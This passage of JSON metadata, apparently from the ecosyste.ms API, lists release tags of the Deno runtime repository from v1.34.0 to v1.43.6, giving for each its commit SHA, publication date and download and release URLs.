osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/Git